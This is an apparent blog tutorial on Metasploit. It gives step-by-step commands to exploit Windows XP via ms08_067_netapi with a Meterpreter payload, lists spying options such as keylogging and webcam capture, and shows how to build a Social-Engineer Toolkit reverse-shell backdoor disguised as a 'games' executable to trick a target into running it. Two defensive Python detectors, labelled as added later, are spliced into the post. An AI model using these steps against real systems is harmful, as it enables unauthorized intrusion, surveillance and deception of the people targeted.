Metasploit can run on Linux, Mac OS X and Windows. It offers both a command-line interface and a graphical user interface (GUI). The Metasploit Framework can be extended with external add-ons in multiple languages, making it a very powerful tool. Metasploit can be used to test the vulnerability of target systems, either to protect them or to break into them. Whether the activity is legitimate or unauthorized, this clearly shows the importance of security.

To exploit a system using the Metasploit Framework you carry out 5 steps:
1. Choose and configure a pre-loaded exploit from the database.
2. Check to see if the target system is susceptible to the exploit.
3. Configure a payload.
4. Encode the payload in order to hide it from an intrusion-prevention system (IPS).
5. Execute the exploit.

In order to choose an exploit and a payload, information about the target is required. There are many ways to gain this information, from port scanning and OS fingerprinting tools such as Nmap to vulnerability scanners such as Nessus. I’ll leave your method of information gathering up to you.

Installation


Installation of the Metasploit Framework depends on your operating system and hardware, so rather than list every way to install it and try to cover all eventualities, I have provided a link to both Windows and Linux installations:

Windows LINK…
Linux LINK…

I would, however, highly recommend that you download Kali Linux, which comes with Metasploit Pro already installed.

Usage


Metasploit is a great tool and a must-have for all security/penetration testers. I will show you a few ways in which Metasploit can be used to exploit a target machine. (All my examples are done using Metasploit on Kali Linux, exploiting a Windows XP SP3 OS.)

Exploit ms08_067_netapi


Here is how to connect to and exploit a target machine using the Metasploit exploit ms08_067_netapi. So first off, let's boot up Metasploit with the command msfconsole.

Now we need to set up our Windows exploit with the following commands:
1. use exploit/windows/smb/ms08_067_netapi
2. set payload windows/meterpreter/bind_tcp
3. set RHOST 192.168.0.10 (this IP address will be your target's IP, gained from a scan)
4. exploit (this command carries out the exploit)

All being well, you should now be connected to the target and able to carry out a number of commands. One of them is the screenshot command.

And that's it, easy!!

There are loads of commands to run under this exploit; just type help and a list will be displayed.
Examples are: recording audio from microphones, screenshots from their webcam, gathering keystrokes and downloading files.
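With a bind_tcp payload the session arrives as a second inbound connection to the target, on a port it did not serve before, shortly after the SMB connection. The following is an added example, not part of the original post, that looks for that sequence in flow records; the `Conn` record layout, the 120-second window, the known-services table and the sample records are assumptions constructed for illustration.

```python
from dataclasses import dataclass

SMB_PORT = 445         # TCP port reached by exploit/windows/smb/* modules
WINDOW_SECONDS = 120   # assumed correlation window, tune for your network


@dataclass(frozen=True)
class Conn:
    """One accepted inbound TCP connection (hypothetical flow-log record)."""
    ts: float    # seconds since start of the log
    src: str     # client address
    dst: str     # server address
    dport: int   # destination port


def find_bind_shell_candidates(conns, known_services, window=WINDOW_SECONDS):
    """Return (src, dst, dport) tuples where src connected to dst over SMB and,
    within `window` seconds, connected to a port dst does not normally serve."""
    last_smb = {}   # (src, dst) -> timestamp of the latest SMB connection
    hits = []
    for c in sorted(conns, key=lambda c: c.ts):
        pair = (c.src, c.dst)
        if c.dport == SMB_PORT:
            last_smb[pair] = c.ts
            continue
        if c.dport in known_services.get(c.dst, set()):
            continue   # expected service such as RDP, not a new listener
        smb_ts = last_smb.get(pair)
        if smb_ts is not None and c.ts - smb_ts <= window:
            hit = (c.src, c.dst, c.dport)
            if hit not in hits:
                hits.append(hit)
    return hits


# Constructed sample records; 192.168.0.10 is the lab target address used above.
SAMPLE = [
    Conn(10.0, "192.168.0.50", "192.168.0.10", 445),
    Conn(12.5, "192.168.0.50", "192.168.0.10", 4444),    # new port right after SMB
    Conn(20.0, "192.168.0.51", "192.168.0.10", 445),
    Conn(25.0, "192.168.0.51", "192.168.0.10", 3389),    # known service
    Conn(900.0, "192.168.0.52", "192.168.0.10", 445),
    Conn(1500.0, "192.168.0.52", "192.168.0.10", 8080),  # outside the window
]
KNOWN_SERVICES = {"192.168.0.10": {139, 445, 3389}}

if __name__ == "__main__":
    for src, dst, dport in find_bind_shell_candidates(SAMPLE, KNOWN_SERVICES):
        print(f"review {dst}: SMB from {src} followed by connection to port {dport}")
```

A hit is a lead for review, not proof: compare the flagged port with the listening sockets on the host before acting on it.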

Social engineering example


Next let's see how to gain access to a target's machine using their interaction. Why, I hear you ask? Well, sometimes it's not possible to connect directly for whatever reason, let's say “security settings”. The following exploit uses the target's interaction to help us gain access.

So first things first, bring up a terminal window and type the command: se-toolkit

Then enter option 1 for social engineering attacks.

Now option 4 to create a payload and listener, and enter your IP address.

Now you need to pick the type of payload; we will go with option 2 – Windows Reverse TCP Meterpreter.

Choose option 16 – Backdoor Executable.
Leave the port set to 443.
(This port is used for secure web browser communication. Data transferred across such connections is highly resistant to eavesdropping and interception, which is ironic considering what we are using it for lol)
And finally start the listener.

OK, so let's recap: we have just created an executable file with a payload hidden within. The next part is a little tricky: you need to send the file to the target computer and get them to execute it. For example call it games and give it a nice icon lol.

Before you send the file, navigate to where it was created, right click it and choose Properties.

Tick the box to allow the file to be executed as a program.

So now we wait. Once the target executes the program, the listener picks up the connection.

From here on in it's the usual Meterpreter > prompt.
As before you can now run commands like screenshot or shell.
The target is yours!
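On the port 443 note above: the port number only says where a connection goes, not that the bytes on it are TLS, and that is something a network monitor can check. The following is an added example, not part of the original post, that tests whether the first client payload of each flow to port 443 is a TLS ClientHello record and reports the flows where it is not; the flow tuple layout, function names and sample flows are assumptions constructed for illustration.

```python
TLS_HANDSHAKE = 0x16      # TLS record content type "handshake"
CLIENT_HELLO = 0x01       # handshake message type "ClientHello"
MAX_RECORD_LEN = 16384    # 2**14, largest TLS plaintext record


def looks_like_client_hello(payload: bytes) -> bool:
    """True if payload starts with a TLS record header carrying a ClientHello."""
    if len(payload) < 6:
        return False      # too short for a 5-byte record header plus message type
    content_type, major, minor = payload[0], payload[1], payload[2]
    record_len = int.from_bytes(payload[3:5], "big")
    return (content_type == TLS_HANDSHAKE
            and major == 0x03 and minor <= 0x04     # SSL 3.0 through TLS 1.3 records
            and 0 < record_len <= MAX_RECORD_LEN
            and payload[5] == CLIENT_HELLO)


def non_tls_flows(flows, port=443):
    """flows: iterable of (src, dst, dport, first_client_payload).
    Return (src, dst) for flows to `port` that do not open with a ClientHello."""
    return [(src, dst) for src, dst, dport, payload in flows
            if dport == port and not looks_like_client_hello(payload)]


# Constructed sample flows (documentation address ranges, made-up payloads).
SAMPLE_FLOWS = [
    # Start of a real-looking ClientHello record: type 0x16, version 3.1, length 512
    ("10.0.0.21", "203.0.113.5", 443,
     bytes.fromhex("1603010200010001fc0303") + b"\x00" * 32),
    # Client connected but sent nothing first (server spoke first)
    ("10.0.0.22", "203.0.113.9", 443, b""),
    # Plain HTTP sent to the HTTPS port
    ("10.0.0.23", "203.0.113.9", 443, b"GET / HTTP/1.1\r\n"),
    # Port 80 is out of scope for this check
    ("10.0.0.24", "203.0.113.7", 80, b"GET / HTTP/1.1\r\n"),
]

if __name__ == "__main__":
    for src, dst in non_tls_flows(SAMPLE_FLOWS):
        print(f"{src} -> {dst}:443 did not start with a TLS ClientHello")
```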


Armitage


We’ve seen how to use Metasploit via the command line; now let's see how to use a graphical version, Armitage, that lets us achieve the same goal.

Armitage is a GUI way of using Metasploit/Meterpreter rather than the command line, so let's get started.

First navigate to Applications > Kali Linux > System Services > Metasploit > community / pro start. This will start the server/database.

Then type armitage in the terminal window and accept the default values.

You will probably get a popup asking to start Metasploit; click Yes.
Don't worry about the connection refused message, it just takes a while to load.
Now Armitage will boot up. If it asks you for the attack computer IP, enter your IP address.
Navigate to the Hosts tab > Nmap Scan > Quick Scan (OS Detect).

From here Armitage will scan a range or a single IP address of your choice, then present it in the black window. Right click the target and click Scan.

When the scan is complete, expand exploit > windows > smb and double click ms08_067_netapi.

This will bring up an attack confirmation window; check the details and click Launch.

Armitage then shows confirmation of a successful exploit.

You can now right click the target and perform multiple commands.

An example is the Interact “remote command shell”.

Websploit


As an added extra, Websploit uses exploits from Metasploit and has its own features as well, which are used to scan and analyse remote systems in order to find vulnerabilities. If you enjoyed this article please comment and I will do one for Websploit. Thank you.

Summary


Metasploit is a must-have for anyone interested in the world of security. You have just seen a few ways in which it can be used; however, keep in mind that this has only scratched the surface of the potential of this tool. To find out more please follow the links below.